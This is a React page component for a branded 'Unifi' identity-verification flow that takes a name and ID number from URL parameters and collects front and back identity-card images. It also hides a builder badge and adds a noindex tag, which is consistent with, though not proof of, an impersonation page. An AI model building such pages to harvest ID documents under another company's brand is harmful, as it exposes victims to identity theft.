import React, { useEffect, useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { KycStepOne } from './KycStepOne';
import { KycStepTwo } from './KycStepTwo';
import { KycSuccess } from './KycSuccess';

const readParams = () => {
  const p = new URLSearchParams(window.location.search);
  return { name: p.get('name') || '', id: p.get('id') || '' };
};

export default function KycPage() {
  const [step, setStep] = useState(1);
  const [info, setInfo] = useState(readParams);
  const [locked, setLocked] = useState(() => Boolean(info.name && info.id));
  const [files, setFiles] = useState({ ic_front: null, ic_back: null });
  const navigate = useNavigate();

  useEffect(() => {
    document.title = 'Unifi KYC';
    const viewport = document.querySelector('meta[name="viewport"]');
    const originalViewport = viewport?.getAttribute('content');
    viewport?.setAttribute('content', 'width=device-width, initial-scale=1, maximum-scale=5');
    const badge = document.getElementById('emergent-badge');
    if (badge) badge.style.display = 'none';
    const meta = document.createElement('meta');
    meta.name = 'robots';
    meta.content = 'noindex, nofollow';
    document.head.appendChild(meta);
    return () => {
      meta.remove();
      if (viewport && originalViewport) viewport.setAttribute('content', originalViewport);
      if (badge) badge.style.display = '';
    };
  }, []);

  useEffect(() => { window.scrollTo(0, 0); }, [step]);

  return (
    <div className="min-h-screen bg-white text-[#1a1a1a]" data-testid="kyc-page">
      <header className="bg-[#EF7300]" data-testid="kyc-header">
        <div className="max-w-[660px] mx-auto px-5 py-6 sm:py-8 flex items-center justify-between gap-4">
          <div>
            <h1 className="text-white font-bold text-2xl sm:text-[30px] leading-tight">Identity Verification</h1>
            <p className="text-white text-sm sm:text-[15px] mt-1">A few steps to verify your identity before we proceed.</p>
          </div>
          <img src="/images/kyc/logo.png" alt="Unifi" className="w-[100px] sm:w-[124px] h-auto shrink-0" />
        </div>
      </header>

      <main className="max-w-[660px] mx-auto px-5 pb-20">
        {step === 1 && (
          <KycStepOne
            initial={info}
            locked={locked}
            onNext={(v) => {
              setInfo(v);
              setLocked(true);
              navigate(`/kyc?${new URLSearchParams({ name: v.name, id: v.id })}`, { replace: true });
              setStep(2);
            }}
          />
        )}
        {step === 2 && <KycStepTwo info={info} files={files} setFiles={setFiles} onBack={() => setStep(1)} onDone={() => setStep(3)} />}
        {step === 3 && <KycSuccess name={info.name} />}
      </main>
    </div>
  );
}
